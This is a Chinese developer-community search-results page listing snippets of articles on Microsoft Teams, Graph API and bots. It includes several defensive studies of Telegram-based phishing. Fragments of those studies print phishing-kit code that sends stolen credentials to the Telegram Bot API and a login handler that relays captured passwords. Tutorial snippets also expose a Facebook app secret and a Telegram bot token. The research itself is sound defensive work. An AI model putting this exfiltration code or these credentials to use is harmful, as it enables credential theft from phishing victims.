使用Graph API (非Bot Framework)向Microsoft团队发送主动消息 - 腾讯云开发者社区

文章/答案/技术大牛

发布

钓鱼攻击中窃取数据的流转路径与防御机制研究

因此，2020年后，此类方式使用率显著下降。2.2 Telegram Bot 成为主流回传通道当前绝大多数钓鱼页面嵌入Telegram Bot API实现即时数据推送。...chat_id=${chatId}&text=${message}`;await fetch(url);}该方案优势显著：Telegram服务器分布全球，抗封锁能力强；Bot通信无需暴露真实IP；消息可自动转发至多个频道或私人群组...Graph API 强制登出用户token = get_access_token() # 获取管理员令牌url = f"https://graph.microsoft.com/v1.0/users/{...5.3 技术对抗：干扰数据回传安全团队亦可主动干扰钓鱼数据回传。...例如，通过DNS sinkholing将钓鱼域名解析至蜜罐服务器，捕获回传请求；或向Telegram Bot发送伪造凭证，污染攻击者数据库。此类主动防御虽不能阻止初始钓鱼，但可降低其运营效率。

1401 0

Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

Telegram Bot API的开放性为此类攻击提供了技术基础。任何开发者均可注册Bot并获取唯一token，通过简单HTTP请求实现消息收发。...context.args else Noneif not email:await update.message.reply_text("Usage: /verify ")return# 向钓鱼站点发送指令...“Microsoft Authenticator”确认页，诱导用户点击“Approve”；会话接管：获取Refresh Token后，攻击者通过Graph API访问邮箱、OneDrive，并向联系人发送新钓鱼邮件...;)企业亦可部署DNS防火墙，阻止对api.telegram.org的非授权访问（除IT管理用途外）。...6 结论Telegram机器人在欧洲凭证钓鱼中的应用，标志着攻击模式从“静态投递”向“动态交互”的演进。其通过Bot API实现数据实时回传与操作指令下发，显著缩短攻击窗口并提升成功率。

1781 0

您找到你想要的搜索结果了吗？

是的

没有找到

Rasa 聊天机器人专栏（四）：消息和语音通道

作者 | VK 编辑 | 奇予纪出品 | 磐创AI团队出品消息和语音通道：如果您在本地计算机（即非服务器）上进行测试，则需要使用[ngrok]()。...这为您的机器提供了域名，以便Facebook，Slack等知道将消息发送到本地计算机的位置。要使您的助手在消息传递平台上可用，您需要在credentials.yml文件中提供凭据。...以下是Facebook凭据的示例： facebook: verify: "rasa-bot" secret: "3e34709d01ea89032asdebfe5a74518" page-access-token...EAAbHPa7H9rEBAAuFk4Q3gPKbDedQnx4djJJ1JmQ7CAqO4iJKrQcNT0wtD" 您的助手可用在：自己的网站定制连接器 Facebook Messenger Slack Telegram Twilio Microsoft...Bot Framework Cisco Webex Teams RocketChat Mattermost 专栏目录 1.Rasa 聊天机器人专栏开篇：简介与安装 2.Rasa 聊天机器人专栏（一）

3.1K1 1

钓鱼团伙用Telegram机器人“接单”：欧洲凭证窃取进入“实时客服”时代

"时间: " . date('Y-m-d H:i:s');// 调用Telegram API发送消息file_get_contents("https://api.telegram.org/bot{$bot_token...开放API成双刃剑Telegram之所以成为钓鱼团伙的首选平台，源于其三大特性：Bot API完全开放且文档完善：开发者可轻松创建具备消息推送、按钮交互、文件传输能力的机器人；端到端加密非默认启用：普通群组和频道通信未加密...攻击者发送伪装成“Microsoft 365存储空间不足”的邮件，内含指向 onedrive-verify[.]eu 的链接。一名工程师点击后，输入了公司邮箱和密码。...原因在于：Telegram使用标准HTTPS（端口443），流量与正常Web浏览无异；数据回传通常通过合法CDN（如Cloudflare）中转，IP信誉良好；消息内容为文本格式，无恶意载荷，难以触发DLP...、Zscaler）阻止对 core.telegram.org 和 api.telegram.org 的非业务访问。

781 0

微软Build 2019有“料”！实现隔空办公、云与AI全面贯彻，惊艳不止三两处

开发人员能够使用他们的GitHub账户登录Azure，从此GitHub的开发者只需要使用一个账号就能够访问开发环境和代码库。更新Microsoft365，发布Fluid Framework框架 ?...本次大会，微软宣布Microsoft Graph数据连接服务正式商用，可帮助组织使用Azure Data Factory将Microsoft Graph中的生产力数据与其自己的业务数据安全地大规模集中在一起...“为了让人们和团队共同创造新的方式，今天我们宣布推出流体框架。” 微软发布了一个新的基于Web的平台和组件化文档模型的框架——Fluid Framework。...预计Fluid Framework将于今年晚些时候通过软件开发套件提供给开发人员，且有望同步推出首批由Fluid Framework驱动的Microsoft 365体验。...“随着语义团队的加入，我们正在加速自己的工作，这项技术也将集成到未来的会话体验中，提供给Cortana、Microsoft Bot Framework和Azure Bot Service中的开发人员使用

8193 0

针对政治机构的鱼叉式钓鱼攻击特征与防御体系构建

例如，发送一封看似来自《卫报》记者的邮件：“我们正在撰写关于您提案的报道，请在此OneDrive链接中查看事实核查草稿”，链接指向攻击者控制的SharePoint站点，页面模仿Microsoft登录界面.../login', async (req, res) => {const { username, password } = req.body;// 立即向Microsoft发起认证const authResp...（2.4）横向移动与持久化获取邮箱访问权后，攻击者常利用“自动转发规则”窃取未来邮件，或通过Graph API读取联系人、会议记录，为下一轮攻击提供情报。...），检测异常：若某议员账户在凌晨3点从境外IP访问并创建邮件转发规则，触发告警；若短时间内向大量非联系人发送含附件邮件，疑似被控为跳板。...（5.1）系统架构前端：Outlook插件，提供举报按钮与可疑链接预览；中台：基于Microsoft Graph API的行为分析引擎；后台：条件访问策略管理与OAuth授权审计模块。

1741 0

使用 .NET 和Teams Toolkit构建 AI 机器人、扩展Copilot for Microsoft 365以及更多

我们很高兴向大家宣布，Teams Toolkit for Visual Studio 2022 17.9 版本为 .NET 开发人员提供了许多令人兴奋的新功能，例如新的 AI Bot 模板、Teams...此模板利用 Teams AI 库和 AI 组件，简化了使用 OpenAI API 密钥或 Azure OpenAI 创建机器人的过程，以提供 AI 驱动的对话体验。...连接OpenAI Assistants API 现在使用 AI Assistants Bot 项目模板构建智能聊天机器人变得更加简单。...选择此模板会创建一个新项目，该项目使用 Teams AI 库来简化 Teams 机器人与 OpenAI Assistants API 的连接，以构建引人入胜的对话体验 – 观看有关使用自定义功能的视频，...开发人员可以在 GitHub 上与 Teams Toolkit 产品团队分享反馈或问题，或者直接向产品团队发送电子邮件 ttkfeedback@microsoft.com。

7671 0

AI 协助办公｜记一次用 GPT-4 写一个消息同步 App

本文记录了我同 GPT 主要的交互过程，中间删减了部分非主线对话。...以下是一个使用 Python 和 Flask 库的简单示例，可以接收 Slack 的 Outgoing Webhook 并将消息发送到 Microsoft Teams 的 Incoming Webhook...以下是一个使用 Python 和 Flask 库的示例，根据 Slack Event API 将消息发送到 Microsoft Teams 的 Incoming Webhook：import jsonfrom...根据用户信息的用户名，我们将仅转发 Alice 和 Bob 发送的消息到 Microsoft Teams。再次增加定制需求我：再改一下，只转发来自 xx 这个组织的用户发送的消息。...您可以使用 Slack API Tester 来测试各种 Slack API 方法，例如发送消息、查询用户或列表、创建频道或更新工作区设置等。

4.3K12 0

Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

本文聚焦于2025年曝光的一类以Telegram为核心载体的高级钓鱼活动，系统剖析其如何利用Bot API、公开频道、WebView嵌入及消息自毁等原生功能，实现凭据窃取、会话劫持与恶意分发的闭环。...此类攻击的核心挑战在于其“合法性掩护”：所有通信均经由telegram.org域名完成，符合SPF/DKIM/DMARC标准；Bot API调用使用HTTPS加密；消息支持自毁与私聊加密，极大增加取证难度...更重要的是，传统安全设备难以区分正常用户使用Telegram与恶意Bot数据回传之间的流量差异。...2.2 技术规避特征通信合法性：所有外传请求发往api.telegram.org，TLS证书有效，无法通过域名黑名单拦截。低频异步传输：单次仅发送一条消息，避免触发流量阈值告警。...3.1 终端行为监控：识别异常Telegram进程企业EDR应监控以下行为：非授权用户启动Telegram Desktop；Telegram进程发起大量POST请求至api.telegram.org/bot

2371 0

使用 Grafana、Prometheus 和 Slack 构建一个简单的 ChatOps 机器人

消息通知是 Grafana 的一个原生功能，具有向 Slack 频道发送报警信息的能力，Slack bot 能够响应关于系统状态的简单问题，以协助进行故障排除。...准备完成后，我们可以用 docker-compose up -d 命令来启动，然后用 kafkacat 向 Kafka 发送一些消息。...第一步是在 Slack 网站上创建和注册机器人，你可以通过登录 Slack，进入 https://api.slack.com/bot-users，然后在该页面上搜索 new bot user integration...然后可以使用 /invite @handy_bot 邀请机器人到测试频道。我们的机器人将回答几个简单的问题，我们将在第1-3行定义。...建立连接第5行：以指定的频率（1秒）轮询，检查是否有任何新事件第7行：如果事件是一个 message，则进入 on_message 方法，如果我们从该方法得到一个响应，则将其打印出来，发送到消息发布的频道中

2.6K2 0

Contentsquare 使用微服务和 Apache Kafka 来发送通知

Contentsquare 的通知功能可以用于密码重置、API 配额超标告警等，并根据用户的喜好通过电子邮件、Slack 或 Microsoft Teams 发送。...Slack Service 和 Microsoft Teams Service（如下所示）分别负责向 Slack 或 Microsoft Teams API 发送通知消息。...用于向 Slack 和 Teams 发送通知的微服务（来源：Contentsquare 工程博客） Contentsquare 软件工程师 Joseph-Emmanuel Banzio 分享了该团队在推出通知功能时的经验...经过仔细研究，这是由于 SPF（Sender Policy Framework）配置错误引起的，安全团队已经解决了这个问题。...将来，该团队计划提升系统弹性，以防系统故障，并提高通知发送的及时性，实现近实时发送。

6691 0

AI赋能开发者？微软用边缘计算解决问题，谷歌FB亚马逊却主要卖广告 | Build 2017

第二个重点是Microsoft Graph的拓展更新，微软表示深耕Microsoft Graph（知识图谱）多年，现已结合了对现实世界的情景认知，能够为工作提供更多的便捷和安全。...微软AI负责人沈向洋在开幕演讲中发布了微软新的认识服务（Cognitive Services）、Microsoft Bot Framework的创新，以及将深度学习应用在微软现有产品（比如Office...沈向洋表示，微软将继续积极寻求将AI融入其各个产品和服务，利用Microsoft Graph为开发者提供更多新的机会和使用场景。...开发人员可以创建Bot并将其发布到微软Bot Framework新开的Cortana channel，构建Cortana技能。...在Build大会上，我们向开发者提供了关于Microsoft Graph的更多细节。它允许用户使用来自其组织内的数据来推动人工智能转型。

1.5K6 0

“量子重定向”钓鱼工具席卷全球：一场针对Microsoft 365的自动化攻防战正在打响

短短48小时内，攻击者接管了5个高管邮箱，并利用其身份向客户发送虚假发票，要求将款项汇至境外账户。损失超过80万美元。类似事件在欧洲亦频发。...2025年10月，某北欧国家税务部门通报一起供应链钓鱼事件：攻击者通过 compromised 供应商邮箱，向政府机构发送“增值税退税通知”，链接指向经过地理适配的钓鱼页。...专家建议采取“纵深防御+主动狩猎”策略：1. 强制使用无密码认证（Passwordless）微软自身早已推荐使用FIDO2安全密钥或Windows Hello进行无密码登录。...# 通过Microsoft Graph API检查用户是否启用FIDO2GET https://graph.microsoft.com/v1.0/me/authentication/methods# 返回结果中若包含...他建议企业采用情境模拟演练：定期向员工发送高度仿真的钓鱼测试邮件（如“HR薪酬调整通知”“IT系统升级提醒”），并根据点击行为推送个性化教育内容。

1051 0

你打出去的“客服电话”，正在把黑客请进公司内网——Microsoft Teams通知成新型钓鱼跳板，回拨型攻击席卷全球企业

内容简洁：“点击此处查看消息”或“如非本人操作，请立即致电技术支持：1-810-221-5391”。他没有多想——这是Teams的标准通知格式，发件域是微软官方，链接也看似无害。...Mandatory Compliance Training”当目标用户被邀请加入这些团队（或被@提及），Teams自动生成通知邮件，发送至其注册邮箱。...攻击者通常经过专业话术培训，能流利使用英语、中文甚至本地口音，冒充：微软/Google官方支持；银行反欺诈部门；云服务商安全团队；内部IT运维人员。...邮件层：增强Teams通知监控限制Teams外部邀请：在Microsoft 365管理中心配置策略，禁止非组织成员创建团队或邀请用户；监控异常团队命名：通过Microsoft Graph API定期扫描团队名称...，识别含“PayPal”“Billing”“Urgent”等关键词的可疑实体；# 示例：通过Graph API列出所有团队GET https://graph.microsoft.com/v1.0/groups

1261 0

telegram-1：向tg的机器人群推送消息

目录： (1).创建telegram机器人 (2).创建一个接受机器人消息的群组 (3).python向bot推送消息的demo 1.相关准备 2.测试demo (1).创建telegram机器人登录...点击START 选择/newbot 输入你要创建的bot机器人名称：必须tg全局唯一，且以bot结尾：创建bot成功，你得到了机器人地址，和对应的访问token，然后变成给机器人发送消息。...这是一个测试用的bot： token：5049056695:AAFfyxCap2I0SZazC0DJ7WPw5oBz9oZcl7A username：@test1aJHcqb3iU_bot 可以在浏览器中使用...(2).创建一个接受机器人消息的群组程序是使用chat_id进行消息推送。我们需要先获取chat_id。建一个群，把这个机器人加入这个群，并发一条消息，必须是“/”开头。...getUpdates 在返回值中找到这个群组的chat_id，机器人会向这个chat_id发送消息： -750599670 (3).python向bot推送消息的demo 1.相关准备去官网查看下api

11.8K3 0

SignalR 项目介绍

SignalR 是 ASP.NET 团队正在开发的一个 Microsoft .NET Framework 库和 jQuery 插件，可能包括在以后版本的 ASP.NET 平台中。...对话通过永久连接进行，允许客户端向服务器发送多个消息，并允许服务器做出相应答复，值得注意的是，还允许服务器向客户端发送异步消息。它和AJax类似，都是基于现有的技术。本身是一个复合体。...聊天室要解决最大的问题就是消息的推送。当N个在线用户同时加入一个聊天室时，1个用户发送消息，服务端就要把这个消息转发给特定的人。...之前的技术都是通过Javascript来不停地发送请求来轮训服务端的新的消息。这种定期发送Ajax请求给服务器的方式，在用户很大的情况下给服务器带来很大的压力。...WebSockets这个技术的出现，很好地解决了这个问题，恰恰支持可以主动推送消息，SignalR 支持WebSockets。

1.6K10 0

开发一个智能客服需要多少钱？

所有的流程都可以通过使用即时可用的NLP服务（如Wit.ai、Api.ai或LUIS）进行智能控制。管理NLP服务需要深入了解.NET和Node.js服务器端SDK。...任务工具时间花费服务器设置和部署 AWS, Node.js, Microsoft Bot Framework 4 $160.00 第2步：NLP集成一旦设置了后端，接下来就创建用于将NLP与每个特定频道集成的端点...通常的做法是在后端设置一个端点，根据访问令牌授权发送和接收消息。此外，您还需要以快速回复按钮或视觉卡的形式实施特定于频道的用户界面，以便通过对话参与并引导用户。...任务工具时间花费 Facebook频道整合和设置 Microsoft Bot Framework 4 $160.00 频道特定的用户界面配置 Facebook Messenger 4 $160.00...这个过程非常简单，包括设置NLP服务和使用服务的SDK处理消息。真正的挑战在于训练NLP意图和实体来理解用户上下文。

7.1K0 0

多通道钓鱼攻击的演化与行为安全防御模型研究

然而，现代工作场所的通信栈已演变为包含以下层级的复杂生态：即时消息层：WhatsApp、Telegram、Signal、WeChat Work；企业协作层：Slack、Microsoft Teams、钉钉...攻击者利用这些平台的 API 或 Webhook 功能，自动化发送消息。...例如，通过 Microsoft Graph API 向 Teams 用户推送伪造的“IT 安全警报”；或利用 Telegram Bot 向财务人员发送“CEO 指令”要求紧急转账。...该模型不关注单条消息内容，而是分析：交互频率与时序：某供应商是否突然频繁联系？渠道偏好突变：长期使用邮件的同事为何改用 Telegram？请求类型异常：HR 是否会直接索要 MFA 令牌？...3.3 系统架构模型由三层组成：数据摄取层：通过企业授权的 API（如 Microsoft Graph、Slack Events API）收集跨平台通信元数据（非完整内容，以保护隐私）；行为图谱构建层：

1621 0

基于微软 Entra B2B 邀请机制的 TOAD 钓鱼攻击分析与防御策略

邀请可通过以下方式发起：手动邀请：管理员或具有“Guest Inviter”角色的用户通过 Azure 门户、Microsoft Graph API 或 PowerShell 发送邀请。...一旦获得权限，攻击者可通过 Microsoft Graph API 发送邀请。...由于整个流程使用合法 API 且经身份验证，邮件完全合规。...Single User条件：同一用户在 1 小时内发送超过 5 次邀请响应：自动禁用该用户邀请权限并告警Graph API 查询示例：GET https://graph.microsoft.com/v1.0...；即使绕过（如使用管理员账户），邮件也被标记，用户识别率提升 78%。此外，通过 Graph API 监控，我们能在 5 分钟内检测到异常邀请模式并自动响应。

1220 0

面向意大利主机托管客户的定向钓鱼攻击机制与防御策略研究

：完全克隆Aruba登录页与支付页，包括CSS、JavaScript及动态表单；CAPTCHA绕过模块：集成reCAPTCHA v2 bypass代理，向真实Google API发起请求并回传token...3.3 数据外泄路径典型数据流如下：Victim → Fake Login Page → PHP Collector Script → Telegram Bot (via API) → Attacker...攻击者创建多个Bot，每个对应一个钓鱼活动，通过/getUpdates轮询或Webhook接收消息。...同时，定期发送安全状态摘要（非操作类邮件），帮助用户区分真伪通知。...6 安全运营建议企业安全团队应采取以下措施：部署品牌保护服务：如Cisco Umbrella、Proofpoint Brand Protection，自动发现并关停仿冒站点；配置邮件内容策略：在Microsoft

1841 0

点击加载更多

钓鱼攻击中窃取数据的流转路径与防御机制研究

Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

Rasa 聊天机器人专栏（四）：消息和语音通道

钓鱼团伙用Telegram机器人“接单”：欧洲凭证窃取进入“实时客服”时代

微软Build 2019有“料”！实现隔空办公、云与AI全面贯彻，惊艳不止三两处

针对政治机构的鱼叉式钓鱼攻击特征与防御体系构建

使用 .NET 和Teams Toolkit构建 AI 机器人、扩展Copilot for Microsoft 365以及更多

AI 协助办公｜记一次用 GPT-4 写一个消息同步 App

Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

使用 Grafana、Prometheus 和 Slack 构建一个简单的 ChatOps 机器人

Contentsquare 使用微服务和 Apache Kafka 来发送通知

AI赋能开发者？微软用边缘计算解决问题，谷歌FB亚马逊却主要卖广告 | Build 2017

“量子重定向”钓鱼工具席卷全球：一场针对Microsoft 365的自动化攻防战正在打响

你打出去的“客服电话”，正在把黑客请进公司内网——Microsoft Teams通知成新型钓鱼跳板，回拨型攻击席卷全球企业

telegram-1：向tg的机器人群推送消息

SignalR 项目介绍

开发一个智能客服需要多少钱？

多通道钓鱼攻击的演化与行为安全防御模型研究

基于微软 Entra B2B 邀请机制的 TOAD 钓鱼攻击分析与防御策略

面向意大利主机托管客户的定向钓鱼攻击机制与防御策略研究

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐